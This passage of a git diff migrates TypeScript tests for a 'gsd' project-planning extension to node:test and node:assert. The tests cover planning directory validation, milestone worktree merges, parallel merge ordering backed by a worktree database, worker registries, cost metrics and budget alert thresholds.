-      assertTrue(sourcePath.endsWith('.planning'), 'path-resolution: .planning appended');
-      assertTrue(existsSync(sourcePath), 'path-resolution: appended path exists');
+      assert.ok(sourcePath.endsWith('.planning'), 'path-resolution: .planning appended');
+      assert.ok(existsSync(sourcePath), 'path-resolution: appended path exists');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
-  }
+});
 
   // ─── Test 2: Path resolution — .planning used as-is ────────────────────
-  console.log('\n=== Path resolution: .planning used as-is when already present ===');
-  {
+
+test('Path resolution: .planning used as-is when already present', () => {
     const base = createCompleteFixture();
     try {
       const planningPath = join(base, '.planning');
@@ -224,39 +222,39 @@ async function main(): Promise<void> {
       if (!sourcePath.endsWith('.planning')) {
         sourcePath = join(sourcePath, '.planning');
       }
-      assertEq(sourcePath, resolve(planningPath), 'path-resolution: .planning not double-appended');
-      assertTrue(existsSync(sourcePath), 'path-resolution: direct path exists');
+      assert.deepStrictEqual(sourcePath, resolve(planningPath), 'path-resolution: .planning not double-appended');
+      assert.ok(existsSync(sourcePath), 'path-resolution: direct path exists');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
-  }
+});
 
   // ─── Test 3: Validation gating — non-existent path ─────────────────────
-  console.log('\n=== Validation gating: non-existent path returns invalid ===');
-  {
+
+test('Validation gating: non-existent path returns invalid', async () => {
     const fakePath = join(tmpdir(), 'gsd-cmd-nonexistent-' + Date.now(), '.planning');
     const result = await validatePlanningDirectory(fakePath);
-    assertEq(result.valid, false, 'validation: non-existent path is invalid');
-    assertTrue(result.issues.length > 0, 'validation: has issues for non-existent path');
+    assert.deepStrictEqual(result.valid, false, 'validation: non-existent path is invalid');
+    assert.ok(result.issues.length > 0, 'validation: has issues for non-existent path');
     const hasFatal = result.issues.some(i => i.severity === 'fatal');
-    assertTrue(hasFatal, 'validation: non-existent path has fatal issue');
-  }
+    assert.ok(hasFatal, 'validation: non-existent path has fatal issue');
+});
 
   // ─── Test 4: Validation gating — valid fixture passes ──────────────────
-  console.log('\n=== Validation gating: valid fixture passes validation ===');
-  {
+
+test('Validation gating: valid fixture passes validation', async () => {
     const base = createCompleteFixture();
     try {
       const result = await validatePlanningDirectory(join(base, '.planning'));
-      assertTrue(result.valid === true, 'validation: valid fixture passes');
+      assert.ok(result.valid === true, 'validation: valid fixture passes');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
-  }
+});
 
   // ─── Test 5: Full pipeline round-trip ──────────────────────────────────
-  console.log('\n=== Full pipeline: parse → transform → preview → write → deriveState ===');
-  {
+
+test('Full pipeline: parse → transform → preview → write → deriveState', async () => {
     const base = createCompleteFixture();
     const writeTarget = mkdtempSync(join(tmpdir(), 'gsd-cmd-write-'));
     try {
@@ -264,17 +262,17 @@ async function main(): Promise<void> {
 
       // (a) Validate
       const validation = await validatePlanningDirectory(planningPath);
-      assertTrue(validation.valid === true, 'pipeline: validation passes');
+      assert.ok(validation.valid === true, 'pipeline: validation passes');
 
       // (b) Parse
       const parsed = await parsePlanningDirectory(planningPath);
-      assertTrue(parsed.roadmap !== null, 'pipeline: roadmap parsed');
-      assertTrue(Object.keys(parsed.phases).length >= 2, 'pipeline: phases parsed');
+      assert.ok(parsed.roadmap !== null, 'pipeline: roadmap parsed');
+      assert.ok(Object.keys(parsed.phases).length >= 2, 'pipeline: phases parsed');
 
       // (c) Transform
       const project = transformToGSD(parsed);
-      assertTrue(project.milestones.length >= 1, 'pipeline: has milestones');
-      assertTrue(project.milestones[0].slices.length >= 1, 'pipeline: has slices');
+      assert.ok(project.milestones.length >= 1, 'pipeline: has milestones');
+      assert.ok(project.milestones[0].slices.length >= 1, 'pipeline: has slices');
 
       // Count totals for preview verification
       let totalTasks = 0;
@@ -294,76 +292,69 @@ async function main(): Promise<void> {
 
       // (d) Preview — verify counts match project data
       const preview = generatePreview(project);
-      assertEq(preview.milestoneCount, project.milestones.length, 'pipeline: preview milestoneCount');
-      assertEq(preview.totalSlices, totalSlices, 'pipeline: preview totalSlices');
-      assertEq(preview.totalTasks, totalTasks, 'pipeline: preview totalTasks');
-      assertEq(preview.doneSlices, doneSlices, 'pipeline: preview doneSlices');
-      assertEq(preview.doneTasks, doneTasks, 'pipeline: preview doneTasks');
+      assert.deepStrictEqual(preview.milestoneCount, project.milestones.length, 'pipeline: preview milestoneCount');
+      assert.deepStrictEqual(preview.totalSlices, totalSlices, 'pipeline: preview totalSlices');
+      assert.deepStrictEqual(preview.totalTasks, totalTasks, 'pipeline: preview totalTasks');
+      assert.deepStrictEqual(preview.doneSlices, doneSlices, 'pipeline: preview doneSlices');
+      assert.deepStrictEqual(preview.doneTasks, doneTasks, 'pipeline: preview doneTasks');
 
       // Completion percentages
       const expectedSlicePct = totalSlices > 0 ? Math.round((doneSlices / totalSlices) * 100) : 0;
       const expectedTaskPct = totalTasks > 0 ? Math.round((doneTasks / totalTasks) * 100) : 0;
-      assertEq(preview.sliceCompletionPct, expectedSlicePct, 'pipeline: preview sliceCompletionPct');
-      assertEq(preview.taskCompletionPct, expectedTaskPct, 'pipeline: preview taskCompletionPct');
+      assert.deepStrictEqual(preview.sliceCompletionPct, expectedSlicePct, 'pipeline: preview sliceCompletionPct');
+      assert.deepStrictEqual(preview.taskCompletionPct, expectedTaskPct, 'pipeline: preview taskCompletionPct');
 
       // Requirements in preview
-      assertEq(preview.requirements.active, 1, 'pipeline: preview requirements active');
-      assertEq(preview.requirements.validated, 1, 'pipeline: preview requirements validated');
-      assertEq(preview.requirements.total, 2, 'pipeline: preview requirements total');
+      assert.deepStrictEqual(preview.requirements.active, 1, 'pipeline: preview requirements active');
+      assert.deepStrictEqual(preview.requirements.validated, 1, 'pipeline: preview requirements validated');
+      assert.deepStrictEqual(preview.requirements.total, 2, 'pipeline: preview requirements total');
 
       // (e) Write
       const result = await writeGSDDirectory(project, writeTarget);
-      assertTrue(result.paths.length > 0, 'pipeline: files written');
+      assert.ok(result.paths.length > 0, 'pipeline: files written');
 
       // Key files exist
       const gsd = join(writeTarget, '.gsd');
-      assertTrue(existsSync(join(gsd, 'PROJECT.md')), 'pipeline: PROJECT.md written');
-      assertTrue(existsSync(join(gsd, 'STATE.md')), 'pipeline: STATE.md written');
-      assertTrue(existsSync(join(gsd, 'REQUIREMENTS.md')), 'pipeline: REQUIREMENTS.md written');
+      assert.ok(existsSync(join(gsd, 'PROJECT.md')), 'pipeline: PROJECT.md written');
+      assert.ok(existsSync(join(gsd, 'STATE.md')), 'pipeline: STATE.md written');
+      assert.ok(existsSync(join(gsd, 'REQUIREMENTS.md')), 'pipeline: REQUIREMENTS.md written');
 
       const m001 = join(gsd, 'milestones', 'M001');
-      assertTrue(existsSync(join(m001, 'M001-ROADMAP.md')), 'pipeline: M001-ROADMAP.md written');
-      assertTrue(existsSync(join(m001, 'M001-CONTEXT.md')), 'pipeline: M001-CONTEXT.md written');
+      assert.ok(existsSync(join(m001, 'M001-ROADMAP.md')), 'pipeline: M001-ROADMAP.md written');
+      assert.ok(existsSync(join(m001, 'M001-CONTEXT.md')), 'pipeline: M001-CONTEXT.md written');
 
       // At least one slice plan exists
       const s01Plan = join(m001, 'slices', 'S01', 'S01-PLAN.md');
-      assertTrue(existsSync(s01Plan), 'pipeline: S01-PLAN.md written');
+      assert.ok(existsSync(s01Plan), 'pipeline: S01-PLAN.md written');
 
       // (f) deriveState — coherent state from written output
       console.log('  --- deriveState ---');
       const state = await deriveState(writeTarget);
-      assertTrue(state.phase !== undefined, 'pipeline: deriveState returns phase');
-      assertTrue(state.activeMilestone !== null, 'pipeline: deriveState has activeMilestone');
-      assertEq(state.activeMilestone!.id, 'M001', 'pipeline: deriveState activeMilestone is M001');
-      assertTrue(state.progress!.slices !== undefined, 'pipeline: deriveState has slices progress');
-      assertTrue(state.progress!.tasks !== undefined, 'pipeline: deriveState has tasks progress');
+      assert.ok(state.phase !== undefined, 'pipeline: deriveState returns phase');
+      assert.ok(state.activeMilestone !== null, 'pipeline: deriveState has activeMilestone');
+      assert.deepStrictEqual(state.activeMilestone!.id, 'M001', 'pipeline: deriveState activeMilestone is M001');
+      assert.ok(state.progress!.slices !== undefined, 'pipeline: deriveState has slices progress');
+      assert.ok(state.progress!.tasks !== undefined, 'pipeline: deriveState has tasks progress');
 
     } finally {
       rmSync(base, { recursive: true, force: true });
       rmSync(writeTarget, { recursive: true, force: true });
     }
-  }
+});
 
   // ─── Test 6: .gsd/ exists detection ────────────────────────────────────
-  console.log('\n=== .gsd/ exists detection ===');
-  {
+
+test('.gsd/ exists detection', () => {
     const base = mkdtempSync(join(tmpdir(), 'gsd-cmd-exists-'));
     try {
       // No .gsd/ yet
-      assertTrue(!existsSync(join(base, '.gsd')), 'exists-detection: .gsd absent initially');
+      assert.ok(!existsSync(join(base, '.gsd')), 'exists-detection: .gsd absent initially');
 
       // Create .gsd/
       mkdirSync(join(base, '.gsd'), { recursive: true });
-      assertTrue(existsSync(join(base, '.gsd')), 'exists-detection: .gsd detected after creation');
+      assert.ok(existsSync(join(base, '.gsd')), 'exists-detection: .gsd detected after creation');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
-  }
-
-  report();
-}
-
-main().catch((err) => {
-  console.error('Unhandled error:', err);
-  process.exit(1);
 });
+
diff --git a/src/resources/extensions/gsd/tests/milestone-transition-worktree.test.ts b/src/resources/extensions/gsd/tests/integration/milestone-transition-worktree.test.ts
similarity index 95%
rename from src/resources/extensions/gsd/tests/milestone-transition-worktree.test.ts
rename to src/resources/extensions/gsd/tests/integration/milestone-transition-worktree.test.ts
index 5616c74ef..a283a6a8c 100644
--- a/src/resources/extensions/gsd/tests/milestone-transition-worktree.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/milestone-transition-worktree.test.ts
@@ -24,7 +24,7 @@ import {
   isInAutoWorktree,
   getAutoWorktreeOriginalBase,
   mergeMilestoneToMain,
-} from "../auto-worktree.ts";
+} from "../../auto-worktree.ts";
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
 
@@ -94,8 +94,8 @@ test("worktree swap on milestone transition: merge old, create new", () => {
     assert.equal(process.cwd(), tempDir, "cwd restored to project root after merge");
     assert.ok(!isInAutoWorktree(tempDir), "no longer in auto-worktree after merge");
 
-    // Verify M001 work was merged to main
-    const mainLog = run("git log --oneline -3", tempDir);
+    // Verify M001 work was merged to main (milestone ID is in trailer, not subject)
+    const mainLog = run("git log -3", tempDir);
     assert.ok(mainLog.includes("M001"), "M001 squash commit should be on main");
 
     // Phase 3: Create new worktree for M002 (simulates new milestone)
@@ -124,7 +124,7 @@ test("worktree swap on milestone transition: merge old, create new", () => {
 
 test("auto/phases.ts milestone transition block contains worktree lifecycle", () => {
   const phasesSrc = readFileSync(
-    join(__dirname, "..", "auto", "phases.ts"),
+    join(__dirname, "../..", "auto", "phases.ts"),
     "utf-8",
   );
 
@@ -147,7 +147,7 @@ test("auto/phases.ts milestone transition block contains worktree lifecycle", ()
 
 test("worktree-resolver mergeAndExit preserves branch when roadmap is missing (#1573)", () => {
   const resolverSrc = readFileSync(
-    join(__dirname, "..", "worktree-resolver.ts"),
+    join(__dirname, "../..", "worktree-resolver.ts"),
     "utf-8",
   );
 
diff --git a/src/resources/extensions/gsd/tests/parallel-merge.test.ts b/src/resources/extensions/gsd/tests/integration/parallel-merge.test.ts
similarity index 75%
rename from src/resources/extensions/gsd/tests/parallel-merge.test.ts
rename to src/resources/extensions/gsd/tests/integration/parallel-merge.test.ts
index 0e8ddcfd3..b438d5fa6 100644
--- a/src/resources/extensions/gsd/tests/parallel-merge.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/parallel-merge.test.ts
@@ -32,12 +32,18 @@ import {
   mergeAllCompleted,
   formatMergeResults,
   type MergeResult,
-} from "../parallel-merge.ts";
-import type { WorkerInfo } from "../parallel-orchestrator.ts";
+} from "../../parallel-merge.ts";
+import type { WorkerInfo } from "../../parallel-orchestrator.ts";
 import {
   writeSessionStatus,
   readSessionStatus,
-} from "../session-status-io.ts";
+} from "../../session-status-io.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  updateMilestoneStatus,
+} from "../../gsd-db.ts";
 
 // ─── Helpers ──────────────────────────────────────────────────────────────────
 
@@ -70,7 +76,6 @@ function makeWorker(overrides: Partial<WorkerInfo> = {}): WorkerInfo {
     worktreePath: "/tmp/test",
     startedAt: Date.now(),
     state: "stopped",
-    completedUnits: 3,
     cost: 1.5,
     ...overrides,
   };
@@ -132,16 +137,16 @@ test("determineMergeOrder — by-completion sorts by startedAt (earliest first)"
   assert.deepEqual(order, ["M003", "M002", "M001"]);
 });
 
-test("determineMergeOrder — only includes stopped workers with completedUnits > 0", () => {
+test("determineMergeOrder — only includes stopped workers", () => {
   const workers = [
-    makeWorker({ milestoneId: "M001", state: "stopped", completedUnits: 3 }),
-    makeWorker({ milestoneId: "M002", state: "running", completedUnits: 2 }),
-    makeWorker({ milestoneId: "M003", state: "stopped", completedUnits: 0 }),
-    makeWorker({ milestoneId: "M004", state: "error", completedUnits: 5 }),
-    makeWorker({ milestoneId: "M005", state: "paused", completedUnits: 1 }),
+    makeWorker({ milestoneId: "M001", state: "stopped" }),
+    makeWorker({ milestoneId: "M002", state: "running" }),
+    makeWorker({ milestoneId: "M003", state: "stopped" }),
+    makeWorker({ milestoneId: "M004", state: "error" }),
+    makeWorker({ milestoneId: "M005", state: "paused" }),
   ];
   const order = determineMergeOrder(workers, "sequential");
-  assert.deepEqual(order, ["M001"]);
+  assert.deepEqual(order, ["M001", "M003"]);
 });
 
 test("determineMergeOrder — empty workers returns empty array", () => {
@@ -169,7 +174,7 @@ test("formatMergeResults — empty results", () => {
 
 test("formatMergeResults — successful merge", () => {
   const results: MergeResult[] = [
-    { milestoneId: "M001", success: true, commitMessage: "feat(M001): Auth", pushed: true },
+    { milestoneId: "M001", success: true, commitMessage: "feat: Auth\n\nGSD-Milestone: M001\nBranch: milestone/M001", pushed: true },
   ];
   const output = formatMergeResults(results);
   assert.ok(output.includes("M001"));
@@ -179,7 +184,7 @@ test("formatMergeResults — successful merge", () => {
 
 test("formatMergeResults — successful merge without push", () => {
   const results: MergeResult[] = [
-    { milestoneId: "M001", success: true, commitMessage: "feat(M001): Auth", pushed: false },
+    { milestoneId: "M001", success: true, commitMessage: "feat: Auth\n\nGSD-Milestone: M001\nBranch: milestone/M001", pushed: false },
   ];
   const output = formatMergeResults(results);
   assert.ok(output.includes("merged successfully"));
@@ -214,7 +219,7 @@ test("formatMergeResults — generic failure without conflict files", () => {
 
 test("formatMergeResults — mixed results", () => {
   const results: MergeResult[] = [
-    { milestoneId: "M001", success: true, commitMessage: "feat(M001): OK", pushed: false },
+    { milestoneId: "M001", success: true, commitMessage: "feat: OK\n\nGSD-Milestone: M001\nBranch: milestone/M001", pushed: false },
     { milestoneId: "M002", success: false, error: "conflict", conflictFiles: ["a.ts"] },
   ];
   const output = formatMergeResults(results);
@@ -282,9 +287,9 @@ test("mergeCompletedMilestone — clean merge, session status cleaned up", async
     // Verify file merged to main
     assert.ok(existsSync(join(repo, "auth.ts")), "auth.ts should be on main");
 
-    // Verify commit on main
-    const log = run("git log --oneline main", repo);
-    assert.ok(log.includes("M010"), "commit message should reference M010");
+    // Verify commit on main (M010 is now in the body as a GSD-Milestone trailer)
+    const log = run("git log -1 --format=%B main", repo);
+    assert.ok(log.includes("GSD-Milestone: M010"), "commit message should reference M010 in trailer");
 
     // Verify session status cleaned up
     const statusAfter = readSessionStatus(repo, "M010");
@@ -466,3 +471,107 @@ test("mergeAllCompleted — by-completion order respects startedAt", async () =>
     cleanup(repo);
   }
 });
+
+// ═══════════════════════════════════════════════════════════════════════════════
+// Bug #2812 — determineMergeOrder should use worktree DB as source of truth
+// ═══════════════════════════════════════════════════════════════════════════════
+
+/** Set up a worktree DB with a milestone marked complete */
+function setupWorktreeDb(basePath: string, mid: string): void {
+  const wtGsdDir = join(basePath, ".gsd", "worktrees", mid, ".gsd");
+  mkdirSync(wtGsdDir, { recursive: true });
+  const dbPath = join(wtGsdDir, "gsd.db");
+  openDatabase(dbPath);
+  insertMilestone({ id: mid, title: `Milestone ${mid}`, status: "complete" });
+  updateMilestoneStatus(mid, "complete", new Date().toISOString());
+  closeDatabase();
+}
+
+test("determineMergeOrder — finds milestones completed in worktree DB even when worker state is 'error' (#2812)", () => {
+  const base = realpathSync(mkdtempSync(join(tmpdir(), "merge-db-bug-")));
+  try {
+    // Simulate the bug scenario: orchestrator has stale "error" state
+    // but the worktree DB shows milestone is actually complete.
+    setupWorktreeDb(base, "M011");
+
+    const workers = [
+      makeWorker({ milestoneId: "M010", state: "error" }),
+      makeWorker({ milestoneId: "M011", state: "error" }),  // stale — actually complete in DB
+      makeWorker({ milestoneId: "M012", state: "running" }),
+    ];
+
+    const order = determineMergeOrder(workers, "sequential", base);
+
+    // M011 should be included because its worktree DB says status='complete'
+    assert.ok(
+      order.includes("M011"),
+      `Expected M011 in merge order (worktree DB says complete), got: [${order}]`,
+    );
+    // M010 and M012 should NOT be included (no worktree DB with complete status)
+    assert.ok(!order.includes("M010"), "M010 should not be in merge order (error, no DB)");
+    assert.ok(!order.includes("M012"), "M012 should not be in merge order (running, no DB)");
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("determineMergeOrder — workers with state='stopped' still included without basePath", () => {
+  // Backward compatibility: existing behavior still works when basePath is omitted
+  const workers = [
+    makeWorker({ milestoneId: "M001", state: "stopped" }),
+    makeWorker({ milestoneId: "M002", state: "error" }),
+  ];
+  const order = determineMergeOrder(workers, "sequential");
+  assert.deepEqual(order, ["M001"]);
+});
+
+test("determineMergeOrder — combines stopped workers and DB-complete milestones without duplicates", () => {
+  const base = realpathSync(mkdtempSync(join(tmpdir(), "merge-dedup-")));
+  try {
+    // M001 is stopped in orchestrator AND complete in worktree DB
+    setupWorktreeDb(base, "M001");
+
+    const workers = [
+      makeWorker({ milestoneId: "M001", state: "stopped" }),
+      makeWorker({ milestoneId: "M002", state: "running" }),
+    ];
+
+    const order = determineMergeOrder(workers, "sequential", base);
+    // M001 should appear exactly once
+    assert.deepEqual(order, ["M001"]);
+  } finally {
+    cleanup(base);
+  }
+});
+
+test("mergeAllCompleted — discovers DB-complete milestones when workers show error (#2812)", async () => {
+  const savedCwd = process.cwd();
+  const repo = createTempRepo();
+
+  try {
+    // Create milestone branch with a file
+    createMilestoneBranch(repo, "M011", [
+      { name: "feature.ts", content: "export const feature = true;\n" },
+    ]);
+    setupRoadmap(repo, "M011", "Feature System", ["S01: Feature module"]);
+
+    // Set up worktree DB showing M011 is complete
+    setupWorktreeDb(repo, "M011");
+
+    // Orchestrator thinks M011 is in error (stale state)
+    const workers = [
+      makeWorker({ milestoneId: "M011", state: "error" }),
+    ];
+
+    process.chdir(repo);
+    const results = await mergeAllCompleted(repo, workers, "sequential");
+
+    // Should find and merge M011 despite orchestrator "error" state
+    assert.equal(results.length, 1, "should have one result");
+    assert.equal(results[0]!.milestoneId, "M011");
+    assert.equal(results[0]!.success, true, `M011 merge should succeed: ${results[0]!.error}`);
+  } finally {
+    process.chdir(savedCwd);
+    cleanup(repo);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-workers-multi-milestone-e2e.test.ts b/src/resources/extensions/gsd/tests/integration/parallel-workers-multi-milestone-e2e.test.ts
similarity index 67%
rename from src/resources/extensions/gsd/tests/parallel-workers-multi-milestone-e2e.test.ts
rename to src/resources/extensions/gsd/tests/integration/parallel-workers-multi-milestone-e2e.test.ts
index c25c966f6..9dc67279e 100644
--- a/src/resources/extensions/gsd/tests/parallel-workers-multi-milestone-e2e.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/parallel-workers-multi-milestone-e2e.test.ts
@@ -13,11 +13,12 @@
  *  - Cost projection with budget ceiling awareness
  */
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
-import { createTestContext } from './test-helpers.ts';
 import {
   registerWorker,
   updateWorker,
@@ -25,12 +26,12 @@ import {
   getWorkerBatches,
   hasActiveWorkers,
   resetWorkerRegistry,
-} from '../../subagent/worker-registry.ts';
+} from '../../../subagent/worker-registry.ts';
 import {
   getBudgetAlertLevel,
   getNewBudgetAlertLevel,
   getBudgetEnforcementAction,
-} from '../auto-budget.ts';
+} from '../../auto-budget.ts';
 import {
   type UnitMetrics,
   type MetricsLedger,
@@ -41,9 +42,7 @@ import {
   formatCostProjection,
   getAverageCostPerUnitType,
   predictRemainingCost,
-} from '../metrics.ts';
-
-const { assertEq, assertTrue, assertMatch, report } = createTestContext();
+} from '../../metrics.ts';
 
 // ─── Fixture helpers ──────────────────────────────────────────────────────────
 
@@ -83,9 +82,9 @@ function cleanup(base: string): void {
 
 // ─── E2E: Parallel workers across M001 and M002 ──────────────────────────────
 
-console.log("\n=== E2E: Parallel workers across milestones ===");
 
-{
+describe('parallel-workers-multi-milestone-e2e', () => {
+test('E2E: Parallel workers across milestones', () => {
   resetWorkerRegistry();
   const base = createFixtureBase();
 
@@ -99,52 +98,49 @@ console.log("\n=== E2E: Parallel workers across milestones ===");
   const w2 = registerWorker("researcher", "Research M001 APIs", 1, 3, batch1Id);
   const w3 = registerWorker("worker", "Implement M001 feature", 2, 3, batch1Id);
 
-  assertEq(getActiveWorkers().length, 3, "M001: 3 parallel workers registered");
-  assertTrue(hasActiveWorkers(), "M001: has active workers");
+  assert.deepStrictEqual(getActiveWorkers().length, 3, "M001: 3 parallel workers registered");
+  assert.ok(hasActiveWorkers(), "M001: has active workers");
 
   const batches1 = getWorkerBatches();
-  assertEq(batches1.size, 1, "M001: single batch");
-  assertEq(batches1.get(batch1Id)!.length, 3, "M001: batch has 3 workers");
+  assert.deepStrictEqual(batches1.size, 1, "M001: single batch");
+  assert.deepStrictEqual(batches1.get(batch1Id)!.length, 3, "M001: batch has 3 workers");
 
   // Complete M001 workers
   updateWorker(w1, "completed");
   updateWorker(w2, "completed");
   updateWorker(w3, "completed");
-  assertTrue(!hasActiveWorkers(), "M001: no active workers after completion");
+  assert.ok(!hasActiveWorkers(), "M001: no active workers after completion");
 
   // Simulate M002 parallel workers (batch 2) — overlapping with M001 cleanup
   const batch2Id = "batch-m002";
   const w4 = registerWorker("scout", "Explore M002 codebase", 0, 2, batch2Id);
   const w5 = registerWorker("worker", "Implement M002 feature", 1, 2, batch2Id);
 
-  assertTrue(hasActiveWorkers(), "M002: has active workers");
+  assert.ok(hasActiveWorkers(), "M002: has active workers");
   const batches2 = getWorkerBatches();
   // M001 workers may still be in cleanup window (5s timeout), M002 workers are active
-  assertTrue(batches2.has(batch2Id), "M002: batch exists");
-  assertEq(batches2.get(batch2Id)!.length, 2, "M002: batch has 2 workers");
+  assert.ok(batches2.has(batch2Id), "M002: batch exists");
+  assert.deepStrictEqual(batches2.get(batch2Id)!.length, 2, "M002: batch has 2 workers");
 
   // One worker fails in M002
   updateWorker(w4, "completed");
   updateWorker(w5, "failed");
-  assertTrue(!hasActiveWorkers(), "M002: no active workers after all finish");
+  assert.ok(!hasActiveWorkers(), "M002: no active workers after all finish");
 
   // Verify worker statuses reflect correctly
   const allWorkers = getActiveWorkers();
   const m002Workers = allWorkers.filter(w => w.batchId === batch2Id);
   if (m002Workers.length > 0) {
     const failedWorker = m002Workers.find(w => w.status === "failed");
-    assertTrue(failedWorker !== undefined, "M002: failed worker tracked");
-    assertEq(failedWorker?.agent, "worker", "M002: failed worker is 'worker'");
+    assert.ok(failedWorker !== undefined, "M002: failed worker tracked");
+    assert.deepStrictEqual(failedWorker?.agent, "worker", "M002: failed worker is 'worker'");
   }
 
   cleanup(base);
-}
+});
 
 // ─── E2E: Metrics accumulation across milestones ──────────────────────────────
-
-console.log("\n=== E2E: Metrics across milestones ===");
-
-{
+test('E2E: Metrics across milestones', () => {
   const base = createFixtureBase();
 
   // Build a ledger spanning two milestones
@@ -175,90 +171,84 @@ console.log("\n=== E2E: Metrics across milestones ===");
 
   // Verify totals
   const totals = getProjectTotals(loaded.units);
-  assertEq(totals.units, 13, "metrics: 13 total units across M001+M002");
+  assert.deepStrictEqual(totals.units, 13, "metrics: 13 total units across M001+M002");
   const totalCost = loaded.units.reduce((sum, u) => sum + u.cost, 0);
-  assertTrue(Math.abs(totals.cost - totalCost) < 0.001, "metrics: total cost matches sum");
+  assert.ok(Math.abs(totals.cost - totalCost) < 0.001, "metrics: total cost matches sum");
 
   // Verify phase aggregation
   const phases = aggregateByPhase(loaded.units);
   const research = phases.find(p => p.phase === "research");
-  assertTrue(research !== undefined, "metrics: research phase exists");
-  assertEq(research!.units, 2, "metrics: 2 research units (M001 + M002)");
+  assert.ok(research !== undefined, "metrics: research phase exists");
+  assert.deepStrictEqual(research!.units, 2, "metrics: 2 research units (M001 + M002)");
 
   const execution = phases.find(p => p.phase === "execution");
-  assertTrue(execution !== undefined, "metrics: execution phase exists");
-  assertEq(execution!.units, 4, "metrics: 4 execution units across both milestones");
+  assert.ok(execution !== undefined, "metrics: execution phase exists");
+  assert.deepStrictEqual(execution!.units, 4, "metrics: 4 execution units across both milestones");
 
   // Verify slice aggregation
   const slices = aggregateBySlice(loaded.units);
-  assertTrue(slices.length >= 4, "metrics: at least 4 slice aggregates (M001/S01, M001/S02, M002/S01, milestone-level)");
+  assert.ok(slices.length >= 4, "metrics: at least 4 slice aggregates (M001/S01, M001/S02, M002/S01, milestone-level)");
 
   const m001s01 = slices.find(s => s.sliceId === "M001/S01");
-  assertTrue(m001s01 !== undefined, "metrics: M001/S01 slice aggregate exists");
+  assert.ok(m001s01 !== undefined, "metrics: M001/S01 slice aggregate exists");
   // M001/S01 has: plan-slice + T01 + T02 + complete-slice = 4 units
-  assertEq(m001s01!.units, 4, "metrics: M001/S01 has 4 units");
+  assert.deepStrictEqual(m001s01!.units, 4, "metrics: M001/S01 has 4 units");
 
   // Cost projection
   const projLines = formatCostProjection(slices, 3, 2.0);
-  assertTrue(projLines.length >= 1, "metrics: cost projection generated");
-  assertMatch(projLines[0], /Projected remaining/, "metrics: projection line text");
+  assert.ok(projLines.length >= 1, "metrics: cost projection generated");
+  assert.match(projLines[0], /Projected remaining/, "metrics: projection line text");
 
   cleanup(base);
-}
+});
 
 // ─── E2E: Budget alert progression through all thresholds ─────────────────────
-
-console.log("\n=== E2E: Budget alert progression 0→75→80→90→100 ===");
-
-{
+test('E2E: Budget alert progression 0→75→80→90→100', () => {
   // Simulate spending progression against a $10 budget ceiling
   const ceiling = 10.0;
 
   // Start: 50% spent
   let lastLevel = getBudgetAlertLevel(5.0 / ceiling);
-  assertEq(lastLevel, 0, "budget: 50% → level 0");
-  assertEq(getNewBudgetAlertLevel(0, 5.0 / ceiling), null, "budget: no alert at 50%");
+  assert.deepStrictEqual(lastLevel, 0, "budget: 50% → level 0");
+  assert.deepStrictEqual(getNewBudgetAlertLevel(0, 5.0 / ceiling), null, "budget: no alert at 50%");
 
   // Spend to 75%
   let newLevel = getNewBudgetAlertLevel(lastLevel, 7.5 / ceiling);
-  assertEq(newLevel, 75, "budget: alert fires at 75%");
+  assert.deepStrictEqual(newLevel, 75, "budget: alert fires at 75%");
   lastLevel = newLevel!;
 
   // Spend to 78% — no alert (between 75 and 80)
-  assertEq(getNewBudgetAlertLevel(lastLevel, 7.8 / ceiling), null, "budget: no alert at 78%");
+  assert.deepStrictEqual(getNewBudgetAlertLevel(lastLevel, 7.8 / ceiling), null, "budget: no alert at 78%");
 
   // Spend to 80% — 80% approach alert
   newLevel = getNewBudgetAlertLevel(lastLevel, 8.0 / ceiling);
-  assertEq(newLevel, 80, "budget: approach alert fires at 80%");
+  assert.deepStrictEqual(newLevel, 80, "budget: approach alert fires at 80%");
   lastLevel = newLevel!;
 
   // Spend to 85% — no alert (still at 80 level)
-  assertEq(getNewBudgetAlertLevel(lastLevel, 8.5 / ceiling), null, "budget: no alert at 85%");
+  assert.deepStrictEqual(getNewBudgetAlertLevel(lastLevel, 8.5 / ceiling), null, "budget: no alert at 85%");
 
   // Spend to 90%
   newLevel = getNewBudgetAlertLevel(lastLevel, 9.0 / ceiling);
-  assertEq(newLevel, 90, "budget: alert fires at 90%");
+  assert.deepStrictEqual(newLevel, 90, "budget: alert fires at 90%");
   lastLevel = newLevel!;
 
   // Spend to 100%
   newLevel = getNewBudgetAlertLevel(lastLevel, 10.0 / ceiling);
-  assertEq(newLevel, 100, "budget: alert fires at 100%");
+  assert.deepStrictEqual(newLevel, 100, "budget: alert fires at 100%");
   lastLevel = newLevel!;
 
   // Over budget — no re-emission
-  assertEq(getNewBudgetAlertLevel(lastLevel, 12.0 / ceiling), null, "budget: no re-alert over 100%");
+  assert.deepStrictEqual(getNewBudgetAlertLevel(lastLevel, 12.0 / ceiling), null, "budget: no re-alert over 100%");
 
   // Enforcement at 80% — still "none" (enforcement only at 100%)
-  assertEq(getBudgetEnforcementAction("pause", 0.80), "none", "budget: no enforcement at 80%");
-  assertEq(getBudgetEnforcementAction("halt", 0.80), "none", "budget: no enforcement at 80%");
-  assertEq(getBudgetEnforcementAction("warn", 0.80), "none", "budget: no enforcement at 80%");
-}
+  assert.deepStrictEqual(getBudgetEnforcementAction("pause", 0.80), "none", "budget: no enforcement at 80%");
+  assert.deepStrictEqual(getBudgetEnforcementAction("halt", 0.80), "none", "budget: no enforcement at 80%");
+  assert.deepStrictEqual(getBudgetEnforcementAction("warn", 0.80), "none", "budget: no enforcement at 80%");
+});
 
 // ─── E2E: Budget prediction with multi-milestone cost data ────────────────────
-
-console.log("\n=== E2E: Budget prediction across milestones ===");
-
-{
+test('E2E: Budget prediction across milestones', () => {
   const units: UnitMetrics[] = [
